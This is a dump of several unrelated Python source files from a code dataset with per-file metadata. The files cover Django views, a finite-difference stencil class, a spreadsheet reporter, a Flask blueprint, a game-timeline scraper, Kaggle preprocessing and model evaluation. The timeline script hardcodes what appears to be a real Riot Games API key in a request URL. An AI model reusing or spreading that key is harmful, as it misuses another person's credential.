= True\n if left[0] > 2:\n left_has_more = True\n if left[0] > 1:\n first = True\n data = {\n 'left': left,\n 'right': right,\n 'left_has_more': left_has_more,\n 'right_has_more': right_has_more,\n 'first': first,\n 'last': last,\n }\n return data\n\n# @login_required\n# def altermanage(request):\n# provider = request.GET.get('provider')\n# if request.user.is_superuser:\n# alter(request)\n# elif request.user == provider:\n# alter(request)\n# else:\n# return render(request,'blog/index.html',{'msg': '没有操作权限'})\n#\n# def alter(request):\n# return render\n\ndef search(request):\n q = request.GET.get('q')\n error_msg = ''\n\n if not q:\n error_msg = \"请输入关键词\"\n return render(request, 'blog/index.html', {'error_msg': error_msg})\n\n post_list = acupoint.objects.filter(Q(title__icontains=q)\n | Q(author__icontains=q)\n | Q(acupuncture__icontains=q)\n | Q(symptom__icontains=q)\n | Q(disease__icontains=q)\n | Q(date__icontains=q))\n return render(request, 'blog/index.html', {'error_msg': error_msg,\n 'post_list': post_list})\n\n# def index(request):\n# post_list = acupoint.objects.all().order_by('-date')\n# return render(request, 'blog/index.html', context={'post_list': post_list})\n\ndef detail(request, pk):\n post = get_object_or_404(acupoint, pk=pk)\n return render(request, 'blog/acupoint.html', context={'post': post})\n\ndef logout_user(request):\n logout(request)\n # Redirect to a success page.\n return HttpResponseRedirect(\"/accounts/login/\")\n\n\n\n", "sub_path": "blog/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4215, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.views.generic.ListView", "line_number": 13, "usage_type": "name"}, {"api_name": "models.acupoint", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 104, "usage_type": "call"}, {"api_name": "models.acupoint.objects.filter", "line_number": 106, "usage_type": "call"}, {"api_name": "models.acupoint.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.acupoint", "line_number": 106, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 106, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 107, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 108, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 109, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 110, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 111, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 112, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 120, "usage_type": "call"}, {"api_name": "models.acupoint", "line_number": 120, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 121, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 124, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "319808950", "text": "from itertools import product\nimport numpy as np\nfrom .utils import to_long_index, to_index_tuple\n\n\nclass Stencil(object):\n \"\"\"\n Represent the finite difference stencil for a given differential operator.\n \"\"\"\n\n def __init__(self, diff_op, shape, old_stl=None, acc=None):\n \"\"\"\n Constructor for Stencil objects.\n\n :param shape: tuple of ints\n Shape of the grid on which the stencil should be applied.\n\n :param axis: int >= 0\n The coordinate axis along which to take the partial derivative.\n\n :param order: int > 0\n The order of the derivative.\n\n :param h: float\n The spacing of the (equidistant) grid\n\n :param acc: (even) int > 0\n The desired accuracy order of the finite difference scheme.\n\n \"\"\"\n\n self.shape = shape\n self.diff_op = diff_op\n self.char_pts = self._det_characteristic_points()\n self.acc = None\n if acc is not None:\n self.acc = acc\n\n self.data = {}\n\n self._create_stencil()\n\n def apply(self, u, idx0):\n \"\"\" Applies the stencil to a point in an equidistant grid.\n\n :param u: ndarray\n An array with the function to differentiate.\n\n :param idx0: int or tuple of ints\n The index of the grid point where to differentiate the function.\n\n :return:\n The derivative at the given point.\n \"\"\"\n\n if not hasattr(idx0, '__len__'):\n idx0 = (idx0, )\n\n typ = []\n for axis in range(len(self.shape)):\n if idx0[axis] == 0:\n typ.append('L')\n elif idx0[axis] == self.shape[axis] - 1:\n typ.append('H')\n else:\n typ.append('C')\n typ = tuple(typ)\n\n stl = self.data[typ]\n\n idx0 = np.array(idx0)\n du = 0.\n for o, c in stl.items():\n idx = idx0 + o\n du += c * u[tuple(idx)]\n\n return du\n\n def apply_all(self, u):\n \"\"\" Applies the stencil to all grid points.\n\n :param u: ndarray\n An array with the function to differentiate.\n\n :return:\n An array with the derivative.\n \"\"\"\n\n assert self.shape == u.shape\n\n ndims = len(u.shape)\n if ndims == 1:\n indices = list(range(len(u)))\n else:\n axes_indices = []\n for axis in range(ndims):\n axes_indices.append(list(range(u.shape[axis])))\n\n axes_indices = tuple(axes_indices)\n indices = list(product(*axes_indices))\n\n du = np.zeros_like(u)\n\n for idx in indices:\n du[idx] = self.apply(u, idx)\n\n return du\n\n def _create_stencil(self):\n\n matrix = self.diff_op.matrix(self.shape, acc=self.acc)\n\n for pt in self.char_pts:\n\n char_point_stencil = {}\n self.data[pt] = char_point_stencil\n\n index_tuple_for_char_pt = self._typical_index_tuple_for_char_point(pt)\n long_index_for_char_pt = to_long_index(index_tuple_for_char_pt, self.shape)\n\n row = matrix[long_index_for_char_pt, :]\n long_row_inds, long_col_inds = row.nonzero()\n\n for long_offset_ind in long_col_inds:\n offset_ind_tuple = np.array(to_index_tuple(long_offset_ind, self.shape), dtype=np.int)\n offset_ind_tuple -= np.array(index_tuple_for_char_pt, dtype=np.int)\n char_point_stencil[tuple(offset_ind_tuple)] = row[0, long_offset_ind]\n\n def _typical_index_tuple_for_char_point(self, pt):\n index_tuple_for_char_pt = []\n for axis, key in enumerate(pt):\n if key == 'L':\n index_tuple_for_char_pt.append(0)\n elif key == 'C':\n index_tuple_for_char_pt.append(self.shape[axis] // 2)\n else:\n index_tuple_for_char_pt.append(self.shape[axis] - 1)\n return tuple(index_tuple_for_char_pt)\n\n def _det_characteristic_points(self):\n shape = self.shape\n ndim = len(shape)\n typ = [(\"L\", \"C\", \"H\")]*ndim\n return product(*typ)\n\n\n", "sub_path": "findiff/stencils.py", "file_name": "stencils.py", "file_ext": "py", "file_size_in_byte": 4158, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 102, "usage_type": "call"}, {"api_name": "utils.to_long_index", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 125, "usage_type": "call"}, {"api_name": "utils.to_index_tuple", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 126, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 144, "usage_type": "call"}]} +{"seq_id": "175191546", "text": "\"\"\"Spreadsheet Summary Printer\n\nThis script allows the user to print important values from exported spreadsheets.\n\nThe script requires that `openpyxl` be installed within the Python environment.\n\n\"\"\"\n\nimport sys\nimport logging\nimport openpyxl as xl\nimport datetime as dt\n\n\ndef get_month(cell_value):\n \"\"\"Extracts the month integer and returns the text name of the month\n\n Parameters\n ----------\n cell_value : datetime\n The spreadsheet cell value containing the month of the column\n\n Returns\n ----------\n month_name : str\n The name of the month from the choosen cell\n \"\"\"\n\n month_int = cell_value.month\n month_name = dt.date(1900, month_int, 1).strftime('%B').lower()\n return month_name\n\n\ndef get_year(cell_value):\n \"\"\"Extracts the year and returns it\n\n Parameters\n ----------\n cell_value : datetime\n The spreadsheet cell value containing the month of the column\n\n Returns\n ----------\n year : str\n The year from the choosen cell\n \"\"\"\n\n year_int = cell_value.year\n year = str(year_int)\n return year\n\n\ndef extract_date_from_file(filename):\n \"\"\"Extracts the month and year from the filename\n\n Parameters\n ----------\n filename : str\n The name of the file\n\n Returns\n ----------\n date : datetime\n A datetime object for the month and year, starting on the first day and first second.\n \"\"\"\n\n try:\n split_filename = filename.split('_')\n month = split_filename[3]\n year = split_filename[4].split('.')[0]\n combined_string = month + ' ' + year\n date = dt.datetime.strptime(combined_string, '%B %Y')\n return date\n except:\n logging.error(\"The file does not have a valid month and year.\")\n sys.exit(1)\n\n\ndef get_percentage(string):\n \"\"\"Extracts the month and year from the filename\n\n Parameters\n ----------\n string : str\n The number as a decimal\n\n Returns\n ----------\n formatted_string : str\n The number as a percentage\n \"\"\"\n formatted_string = \"{:.2%}\".format(string)\n return formatted_string\n\n\ndef main():\n logging.basicConfig(filename='expedia.log', format='%(asctime)s - %(levelname)% - %(message)s')\n\n try:\n filename = sys.argv[1]\n file_date = extract_date_from_file(filename)\n except:\n logging.error(\"The wrong file was provided.\")\n sys.exit(1)\n\n wb = xl.open(filename)\n\n try:\n sheet1 = wb['Summary Rolling MoM']\n sheet2 = wb['VOC Rolling MoM']\n except:\n logging.error(\"The file does not have the right worksheets.\")\n sys.exit(1)\n\n # Search row range for matching month, year value!!!\n for row in sheet1.iter_rows(min_row=2, max_row=13, max_col=6, values_only=True):\n month = get_month(row[0])\n year = get_year(row[0])\n\n if file_month == month and file_year == year:\n logging.info(f\"{month}, {year} - Calls Offered: {row[1]:,}\")\n logging.info(f\"{month}, {year} - Abandon after 30s: {get_percentage(row[2])}\")\n logging.info(f\"{month}, {year} - FCR: {get_percentage(row[3])}\")\n logging.info(f\"{month}, {year} - DSAT: {get_percentage(row[4])}\")\n logging.info(f\"{month}, {year} - CSAT: {get_percentage(row[5])}\")\n\n # Search col range for matching month, year value!!!\n for col in sheet2.iter_cols(min_row=0, max_row=9, min_col=2, max_col=24, values_only=True):\n month = get_month(col[0])\n year = get_year(col[0])\n\n if file_month == month and file_year == year:\n logging.info(f\"{month}, {year} - Promoters: {col[3]}, {'Good' if col[3] > 200 else 'Bad'}\")\n logging.info(f\"{month}, {year} - Passives: {col[5]}, {'Good' if col[5] > 100 else 'Bad'}\")\n logging.info(f\"{month}, {year} - Detractors: {col[7]}, {'Good' if col[7] > 100 else 'Bad'}\")\n\n print('Check log file for output')\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "week_1/weekend_project_1/spreadsheet.py", "file_name": "spreadsheet.py", "file_ext": "py", "file_size_in_byte": 3960, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "datetime.date", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 72, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 72, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 75, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 97, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 100, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 103, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 104, "usage_type": "call"}, {"api_name": "openpyxl.open", "line_number": 106, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 112, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 113, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 121, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 123, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 124, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 125, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 133, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 134, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "569872652", "text": "from flask import Blueprint , jsonify , request, make_response\nfrom app.defend.defend_module import defend_module\nfrom app.auth import auth_check\n\ndefend_handler = Blueprint('defend_handler', __name__)\n\n@defend_handler.route('/newissue' , methods=['POST'])\n@auth_check()\ndef defend_issue_route(userid = -1):\n request_json = request.json\n request_json['userid'] = userid\n msg = defend_module.create_issue(request_json)\n return jsonify(msg)\n\n@defend_handler.route('/queryissue' , methods=['POST'])\n@auth_check()\ndef defend_query_route(userid = -1):\n request_json = request.json\n msg = defend_module.query_issue(request_json)\n return jsonify(msg)\n\n@defend_handler.route('/userissues' , methods=['GET'])\n@auth_check()\ndef defend_user_issues_route(userid = -1):\n msg = defend_module.query_user_issues(userid)\n return jsonify(msg)\n\n@defend_handler.route('/delissue' , methods=['POST'])\n@auth_check()\ndef defend_del_issue_route(userid = -1):\n request_json = request.json\n request_json['userid'] = userid\n msg = defend_module.del_issue(request_json)\n return jsonify(msg)", "sub_path": "app/defend/defend_blueprint.py", "file_name": "defend_blueprint.py", "file_ext": "py", "file_size_in_byte": 1101, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Blueprint", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 10, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 10, "usage_type": "name"}, {"api_name": "app.defend.defend_module.defend_module.create_issue", "line_number": 12, "usage_type": "call"}, {"api_name": "app.defend.defend_module.defend_module", "line_number": 12, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 13, "usage_type": "call"}, {"api_name": "app.auth.auth_check", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "app.defend.defend_module.defend_module.query_issue", "line_number": 19, "usage_type": "call"}, {"api_name": "app.defend.defend_module.defend_module", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 20, "usage_type": "call"}, {"api_name": "app.auth.auth_check", "line_number": 16, "usage_type": "call"}, {"api_name": "app.defend.defend_module.defend_module.query_user_issues", "line_number": 25, "usage_type": "call"}, {"api_name": "app.defend.defend_module.defend_module", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 26, "usage_type": "call"}, {"api_name": "app.auth.auth_check", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "app.defend.defend_module.defend_module.del_issue", "line_number": 33, "usage_type": "call"}, {"api_name": "app.defend.defend_module.defend_module", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 34, "usage_type": "call"}, {"api_name": "app.auth.auth_check", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "550469025", "text": "import requests\nimport json\n\nurl = \"https://kr.api.riotgames.com/lol/match/v4/timelines/by-match/4659518008?api_key=RGAPI-4dcd2099-2605-4440-9864-f53a305141e7\"\ntime_data = requests.get(url).json()[\"frames\"]\n# print(time_data)\n\n# 필수 이벤트\nevents_creator_id = [\"WARD_PLACED\"]\nevents_killer_id = [\"WARD_KILL\", \"BUILDING_KILL\", \"CHAMPION_KILL\"]\nevents_moster_kill = [\"ELITE_MONSTER_KILL\"]\n\npart_set = [dict() for _ in range(11)]\n# print(part_set)\n\ntime = 22 # 사건시간이 22~23인 경우\n\nfor t in range(1, time):\n events = time_data[t][\"events\"]\n for event in events:\n # 이벤트가 필수 이벤트(creatorId)라면\n if event[\"type\"] in events_creator_id:\n real_event = event[\"type\"]\n # 해당 인덱스의 dict에 횟수를 누적한다\n part_set[event[\"creatorId\"]].setdefault(real_event, 0)\n part_set[event[\"creatorId\"]][real_event] += 1\n\n # 이벤트가 필수 이벤트(killerId)라면\n elif event[\"type\"] in events_killer_id:\n real_event = event[\"type\"]\n # 해당 인덱스의 dict에 횟수를 누적한다\n part_set[event[\"killerId\"]].setdefault(real_event, 0)\n part_set[event[\"killerId\"]][real_event] += 1\n \n # 이벤트가 필수 이벤트(monsterkill)라면\n elif event[\"type\"] in events_moster_kill:\n real_event = event[\"type\"]\n # 해당 인덱스의 dict에 횟수를 누적한다\n part_set[event[\"killerId\"]].setdefault(real_event, [])\n part_set[event[\"killerId\"]][real_event] += [event[\"monsterType\"]]\n\n \n # 사건 직전 누적 골드\n if t == time - 1:\n part_info = time_data[t][\"participantFrames\"]\n # 1번 부터 10번까지 누적 기록 저장\n for idx in range(1, 11):\n part_set[idx][\"totalGold\"] = part_info[str(idx)][\"totalGold\"]\n part_set[idx][\"level\"] = part_info[str(idx)][\"level\"]\n part_set[idx][\"minionsKilled\"] = part_info[str(idx)][\"minionsKilled\"]\n\nprint(part_set)\n", "sub_path": "데마시아5/DEMACIA5/djangobackend/timeline_before.py", "file_name": "timeline_before.py", "file_ext": "py", "file_size_in_byte": 2058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "317492170", "text": "#这个文件主要对缺失值进行了处理,少的直接用平均值进行填充,缺的多的用xgboost进行预测\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.stats import mode\n\nfrom sklearn import model_selection, preprocessing\nimport xgboost as xgb\nimport datetime\n#now = datetime.datetime.now()\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import make_scorer\n\npd.options.mode.chained_assignment = None # default='warn'\npd.set_option('display.max_columns', 500)\n\ntrain = pd.read_csv('kaggle/russia/train.csv')\ntest = pd.read_csv('kaggle/russia/test.csv')\nmacro = pd.read_csv('kaggle/russia/macro.csv')\n\n\ny_train = train[\"price_doc\"]\nx_train = train.drop([\"id\", \"timestamp\", \"price_doc\"], axis=1)\nx_test = test.drop([\"id\", \"timestamp\"], axis=1)\nid_test = test.id\n\n# can't merge train with test because the kernel run for very long time\ndtype_df=x_train.dtypes.reset_index()\ndtype_df.columns=[\"Count\",\"ColumnsType\"]\ndtype_df.groupby(\"ColumnsType\").aggregate(\"count\").reset_index()\n#统计属性为object的值\ncol_object=[]\nfor x in dtype_df[dtype_df['ColumnsType']==object]['Count']:\n col_object.append(x)\n#统计的结果 int64 共有155,float64共有119 object 15\n#缺失值统计\nmissing_df=train.isnull().sum(axis=0).reset_index()\nmissing_df.columns=['columns_name','missing_count']\nmissing_df=missing_df.ix[missing_df['missing_count']>0]\nmissing_df['missing_ratio']=missing_df['missing_count']/30471\n\nmissing_df1=test.isnull().sum(axis=0).reset_index()\nmissing_df1.columns=['columns_name','missing_count']\nmissing_df1=missing_df1.ix[missing_df1['missing_count']>0]\nmissing_df1['missing_ratio']=missing_df1['missing_count']/7662\n\nfor x in missing_df['columns_name']:\n # print(x,\">>\",x_test[x].dtype)\n if x_test[x].dtype == 'int64':\n print(x)\n\nfor x in x_test.columns:\n if x_test[x].dtype == 'object':\n print(x)\nl1=[]\nl2=[]\nfor x in missing_df['columns_name']:\n l1.append(x)\nfor x in missing_df1['columns_name']:\n l2.append(x)\n[x for x in l1 if x not in l2]\n\nind=np.arange(missing_df.shape[0])\nwidth=0.9\nfig, ax = plt.subplots(figsize=(12,18))\nrects = ax.barh(ind, missing_df.missing_count.values, color='y')\nax.set_yticks(ind)\nax.set_yticklabels(missing_df.columns_name.values, rotation='horizontal')\nax.set_xlabel(\"Count of missing values\")\nax.set_title(\"Number of missing values in each column\")\nplt.show(block=False)\n\n# data=train.groupby(['Title','Pclass'])['age']\n# train['age']=data.transform(lambda x:x.fillna())\n#\n#------------------------------------------\n#处理缺失值\n#--------------------------------------------\n\nfull=pd.concat([train,test])\n#state中有一个异常值33替换为3\nfull['state'].replace(33,3,inplace=True)\n#从scipy导入的求众数的函数,注意不能有缺失值\n#填充test中缺少的product_type和green_part_2000\nmode(full['green_part_2000']).mode[0]\nfull['green_part_2000'].fillna(full['green_part_2000'].mean(),inplace=True)\nfull['product_type'].value_counts()\nfull['product_type'].fillna('Investment',inplace=True)\n#对build_year进行处理\nfull.build_year.value_counts()\nfull.loc[full['build_year']==20052009,'build_year']=2005\nfull.loc[full['build_year']==0,'build_year']=np.nan\nfull.loc[full['build_year']==1,'build_year']=np.nan\nfull.loc[full['build_year']==20,'build_year']=2000\nfull.loc[full['build_year']==215,'build_year']=2015\nfull.loc[full['build_year']==3,'build_year']=np.nan\nfull.loc[full['build_year']==2,'build_year']=np.nan\nfull.loc[full['build_year']==71,'build_year']=np.nan\nfull.loc[full['build_year']==4965,'build_year']=np.nan\n#对sub_area进行重新划分,这个脚本里面没有,再dataprocess1.py中分块了,效果不是很好\n\n# full.loc[full['sub_area']=='']\n\nfull.drop([\"id\", \"timestamp\", \"price_doc\"], axis=1,inplace=True)\n\n\n\n#之前是289列,get_dummies之后是451列\nfull=pd.get_dummies(full,columns=col_object)\n\n\n#模型调参\ndef get_model(estimator, parameters, X_train, y_train, scoring):\n model = GridSearchCV(estimator, param_grid=parameters, scoring=scoring)\n model.fit(X_train, y_train)\n return model.best_estimator_\n\n#\n# X=full[full.floor.notnull()].drop('floor',axis=1)\n# y=full[full.floor.notnull()].floor\n#\n# X_train,X_test,y_train,y_test=train_test_split(X,y,random_state=2017)\n# XGB = xgb.XGBRegressor(max_depth=4, seed= 2017)\nscoring = make_scorer(mean_absolute_error, greater_is_better=False)\nparameters = {'reg_alpha':np.linspace(0.1,1.0,5), 'reg_lambda': np.linspace(1.0,3.0,5)}\n# reg_xgb = get_model(XGB, parameters, X_train, y_train, scoring)\n# print (reg_xgb)\n# print (\"Mean absolute error of test data: {}\".format(mean_absolute_error(y_test, reg_xgb.predict(X_test))))\n# #3.49323\n# pred = reg_xgb.predict(full[full.floor.isnull()].drop('floor', axis=1))\n# full.loc[(full.floor.isnull()),'floor']=pred\nfor att in missing_df['columns_name']:\n print(train[att].isnull().sum())\n\nfor att in missing_df['columns_name']:\n X = full[full[att].notnull()].drop(att, axis=1)\n y = full[full[att].notnull()][att]\n X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=2017)\n\n XGB = xgb.XGBRegressor(max_depth=4, seed=2017)\n\n reg_xgb = get_model(XGB, parameters, X_train, y_train, scoring)\n print(reg_xgb)\n print(att,\"Mean absolute error of test data: {}\".format(mean_absolute_error(y_test, reg_xgb.predict(X_test))))\n pred = reg_xgb.predict(full[full[att].isnull()].drop(att, axis=1))\n full.loc[(full[att].isnull()), att] = pred\n\n\n\nfull.to_csv('kaggle/russia/full.csv', index=False)", "sub_path": "zyf/dataprocess.py", "file_name": "dataprocess.py", "file_ext": "py", "file_size_in_byte": 5636, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.options", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pandas.set_option", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 83, "usage_type": "call"}, {"api_name": "scipy.stats.mode", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 99, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 100, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 102, "usage_type": "attribute"}, {"api_name": "pandas.get_dummies", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 117, "usage_type": "call"}, {"api_name": "sklearn.metrics.make_scorer", "line_number": 127, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 127, "usage_type": "argument"}, {"api_name": "numpy.linspace", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 141, "usage_type": "call"}, {"api_name": "xgboost.XGBRegressor", "line_number": 143, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 147, "usage_type": "call"}]} +{"seq_id": "313812459", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 8 21:10:53 2019\n\n@author: ssharma\n\"\"\"\n#import numpy as np\nimport torch\nfrom torch.autograd import Variable\n#from sklearn import metrics\nfrom .conf_mat import calc_conf_mat\n\n\ndef evaluate(model, data_loader, criterion, num_classes, DEVICE):\n model.eval()\n model = model.to(DEVICE)\n\n n_correct = 0\n loss = 0\n\n with torch.no_grad():\n for batch_idx, (data, target) in enumerate(data_loader):\n data, target = Variable(data), Variable(target)\n data = data.float()\n data = data.to(DEVICE)\n target = target.to(DEVICE)\n\n output = model(data)\n\n loss += criterion(output, target).item()\n\n pred = output.data.max(1, keepdim=True)[1]\n n_correct += pred.eq(target.data.view_as(pred)).cpu().sum().item()\n\n if batch_idx == 0:\n pred_cat = pred\n targ_cat = target\n else:\n pred_cat = torch.cat((pred_cat, pred))\n targ_cat = torch.cat((targ_cat, target))\n\n conf_matrix = calc_conf_mat(pred_cat, targ_cat, num_classes)\n\n loss /= len(data_loader)\n acc = n_correct / len(data_loader.dataset)\n\n return (loss, acc), conf_matrix\n", "sub_path": "birdsong/training/evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 1278, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.no_grad", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 41, "usage_type": "call"}, {"api_name": "conf_mat.calc_conf_mat", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "464955749", "text": "import datetime \n\nfrom django.contrib import admin\nfrom django.db import models\nfrom django.test import TestCase\nfrom django.test.client import Client\n\nfrom reversion import get_registered_models, create_revision\n\nfrom publishing import register\n\nfrom .admin import PublishingAdmin\nfrom .models import Publishing\nfrom .models import DRAFT_STATUS\nfrom .options import PublishingOptions\n\nclass Article(Publishing):\n \"\"\"\n A sample article model that subclasses Publishing\n \"\"\"\n title = models.CharField(max_length=255)\n slug = models.SlugField(unique=True)\n body = models.TextField()\n \n create_date = models.DateTimeField(default=datetime.datetime.now)\n update_date = models.DateTimeField(auto_now=True)\n publish_date = models.DateTimeField(default=datetime.datetime.now)\n\n class PublishingMeta:\n date_field = 'publish_date'\n \n def __unicode__(self):\n return self.title\n \n \nclass ArticleAdmin(PublishingAdmin):\n pass \nadmin.site.register(Article, ArticleAdmin)\n \nclass Story(Publishing):\n \"\"\"\n A sampe story model that subclasses Publishing with a few custom meta options\n \"\"\"\n title = models.CharField(max_length=255)\n slug = models.SlugField(unique=True)\n body = models.TextField()\n \n create_date = models.DateTimeField(default=datetime.datetime.now)\n update_date = models.DateTimeField(auto_now=True)\n \n class PublishingMeta:\n date_field_attr = \"published_date\"\n date_field_verbose_name = \"Pub Date\"\n date_field_help_text = \"Use this field to publish stories!\"\n \n def __unicode__(self):\n return self.title\n \nclass StoryAdmin(PublishingAdmin):\n pass \nadmin.site.register(Story, StoryAdmin)\n \n \nclass Gallery(models.Model):\n \"\"\"\n A sample gallery model that does not subclass Publishing but still \n registers with Publishing\n \"\"\"\n title = models.CharField(max_length=255)\n slug = models.SlugField(unique=True)\n body = models.TextField()\n \n create_date = models.DateTimeField(default=datetime.datetime.now)\n update_date = models.DateTimeField(auto_now=True)\n publish_date = models.DateTimeField(default=datetime.datetime.now)\n \n def __unicode__(self):\n return self.title \n\nadmin.site.register(Gallery) \nregister(Gallery, admin=True)\n\nclass Photo(models.Model):\n \"\"\"\n A sample photo model that does not use Publishing at all.\n \"\"\"\n title = models.CharField(max_length=255)\n slug = models.SlugField(unique=True)\n body = models.TextField()\n \n create_date = models.DateTimeField(default=datetime.datetime.now)\n update_date = models.DateTimeField(auto_now=True)\n \n\nclass Content(Publishing):\n title = models.CharField(max_length=255)\n slug = models.SlugField(unique=True)\n body = models.TextField()\n \n create_date = models.DateTimeField(default=datetime.datetime.now)\n update_date = models.DateTimeField(auto_now=True)\n publish_date = models.DateTimeField(default=datetime.datetime.now)\n expired_date = models.DateTimeField(null=True, blank=True)\n \n class Meta:\n abstract = True\n \n class PublishingMeta:\n date_field = 'publish_date'\n expired_field = 'expired_date'\n \n \nclass NewStory(Content):\n sub_title = models.CharField(max_length=255)\n \n \nclass AnotherStory(Content):\n \n class Meta:\n abstract = True\n \n class PublishingMeta:\n date_field_attr = \"another_story_publish_date\"\n\n\nclass YetAnotherStory(AnotherStory):\n pass\n \n\nclass PublishingBaseTest(TestCase):\n \"\"\"\n Tests for ngs-publishing\n \"\"\"\n # fixtures = ['test_articles.json']\n \n def setUp(self):\n \n # Create some records for testing using reversion, the reason these \n # are seperated out is so reversion creates a revision per object,\n # otherwise it would only create one revision for all three instances.\n with create_revision():\n self.article = Article.objects.create(title=\"Article 001\", slug=\"article-001\", body=\"article body\")\n \n with create_revision():\n self.story = Story.objects.create(title=\"Story 001\", slug=\"story-001\", body=\"story body\")\n \n with create_revision():\n self.gallery = 